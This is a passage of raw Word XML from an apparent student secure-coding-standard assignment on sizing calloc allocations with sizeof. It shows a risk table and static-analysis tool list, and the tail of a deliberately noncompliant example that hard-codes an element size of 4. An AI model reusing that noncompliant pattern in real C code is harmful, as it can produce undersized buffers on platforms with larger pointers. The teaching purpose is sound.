            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, 4);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48F69923" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve">    if (matrix[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>] == NULL) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="375DAB75" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve">      return -1; /* Indicate </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>calloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) failure */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F8775E2" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AC2126E" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7249C9B2" w14:textId="77777777" w:rsidR="00FB3A9A" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w:r>
              <w:t xml:space="preserve"> return </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>0;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1A4D0FA6" w14:textId="13CB934C" w:rsidR="00FB3A9A" w:rsidRPr="00380076" w:rsidRDefault="00FB3A9A" w:rsidP="00FB3A9A">
            <w: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A72503">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Compliant Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="1F28B88D" w14:textId="77777777" w:rsidTr="00FB3A9A">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196051A4" w14:textId="45D7BE32" w:rsidR="00F72634" w:rsidRDefault="001006D2" w:rsidP="00A72503">
            <w:r w:rsidRPr="001006D2">
              <w:t xml:space="preserve">This compliant solution replaces the hard-coded value 4 with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="001006D2">
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001006D2">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="001006D2">
              <w:t>int *):</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB3A9A" w14:paraId="4847C47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69A6F8" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t>int f(void) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53375980" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0D716270" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t xml:space="preserve">  int **matrix = (int *</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>*)</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>calloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">(100, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(*matrix));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51DA1B7B" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t xml:space="preserve">  if (matrix == NULL) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="375D31C0" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t xml:space="preserve">    return -1; /* Indicate </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>calloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) failure */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D4A5417" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7788B8D0" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5327082F" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">  for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14:paraId="1B71E066" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t xml:space="preserve">    matrix[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">] = (int </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>*)</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>calloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(**matrix));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ABA5D0D" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t xml:space="preserve">    if (matrix[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>] == NULL) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A90BE2C" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t xml:space="preserve">      return -1; /* Indicate </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>calloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) failure */</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DDC80F6" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F4C5B8D" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F60DF33" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="425FA375" w14:textId="77777777" w:rsidR="00663362" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t xml:space="preserve">  return </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>0;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="767A2E1B" w14:textId="6A0EAA20" w:rsidR="00FB3A9A" w:rsidRPr="001006D2" w:rsidRDefault="00663362" w:rsidP="00663362">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14107C1E" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00B475A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57764A23" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Int_lIyvGJC6"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Note: Stop here for the milestone. Complete this section for Project One in Module Six.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>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0219F3F" w14:textId="43D1429E" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r w:rsidR="007E7849">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00145FB8" w:rsidRPr="00B32F74">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Heed Compiler Warnings:</w:t>
            </w:r>
            <w:r w:rsidR="00145FB8" w:rsidRPr="00145FB8">
              <w:t xml:space="preserve"> Using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00145FB8" w:rsidRPr="00145FB8">
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00145FB8" w:rsidRPr="00145FB8">
              <w:t xml:space="preserve"> helps in avoiding hard-coded sizes, which can trigger compiler warnings about potential issues with data type sizes, leading to more stable and secure code.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F9778D0" w14:textId="5D80FA40" w:rsidR="00145FB8" w:rsidRDefault="009A5D3E" w:rsidP="54BB6B49">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r w:rsidR="00145FB8" w:rsidRPr="00B32F74">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Keep It Simple:</w:t>
            </w:r>
            <w:r w:rsidR="00145FB8" w:rsidRPr="00145FB8">
              <w:t xml:space="preserve"> By using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00145FB8" w:rsidRPr="00145FB8">
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00145FB8" w:rsidRPr="00145FB8">
              <w:t xml:space="preserve"> instead of hard-coded values, the code becomes simpler and easier to maintain, reducing the risk of errors and vulnerabilities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7007063D" w14:textId="2894CF7E" w:rsidR="00B32F74" w:rsidRDefault="001B26B8" w:rsidP="54BB6B49">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">10. </w:t>
            </w:r>
            <w:r w:rsidR="00B32F74" w:rsidRPr="00EC5664">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Adopt a Secure Coding Standard:</w:t>
            </w:r>
            <w:r w:rsidR="00B32F74" w:rsidRPr="00B32F74">
              <w:t xml:space="preserve"> Using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B32F74" w:rsidRPr="00B32F74">
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B32F74" w:rsidRPr="00B32F74">
              <w:t xml:space="preserve"> aligns with secure coding standards and best practices, ensuring type sizes are handled correctly and consistently across different environments, promoting overall security.</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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="333F9847" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29C1A6F3" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="052E72E0" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61F9B07F" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="2900117D" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49A8E1A2" w14:textId="4EDB64FF" w:rsidR="00B475A1" w:rsidRDefault="00AB42A4" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EE4DA51" w14:textId="0DB3A452" w:rsidR="00B475A1" w:rsidRDefault="00AB42A4" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C9846CA" w14:textId="64ED5C7E" w:rsidR="00B475A1" w:rsidRDefault="00AB42A4" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58E0ACD7" w14:textId="6E74EF8D" w:rsidR="00B475A1" w:rsidRDefault="00AB42A4" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E539ECE" w14:textId="56D646CA" w:rsidR="00B475A1" w:rsidRDefault="00AB42A4"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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B50FAFE" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6CB9DFED" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31D07877" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E10CF" w14:paraId="34797317" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F729ADB" w14:textId="6840FF02" w:rsidR="007E10CF" w:rsidRDefault="00000000" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidR="007E10CF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Astrée</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AAB69D9" w14:textId="7E53A941" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>24.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D087CB4" w14:textId="5B25925D" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>alloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>-without-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29A4DB2F" w14:textId="2B0D7B22" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E10CF" w14:paraId="39933CAB" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32410B1A" w14:textId="1D0FB2D5" w:rsidR="007E10CF" w:rsidRDefault="00000000" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidR="007E10CF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Compass/ROSE</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0453C4CF" w14:textId="5EBD3613" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CB1DCF1" w14:textId="7E4C68D8" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E75D5AD" w14:textId="545F3402" w:rsidR="007E10CF" w:rsidRDefault="007E10CF" w:rsidP="007E10CF">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Can detect violations of this recommendation. In particular, it looks for the size argument of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>malloc(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>calloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>realloc</w:t>
            </w:r>
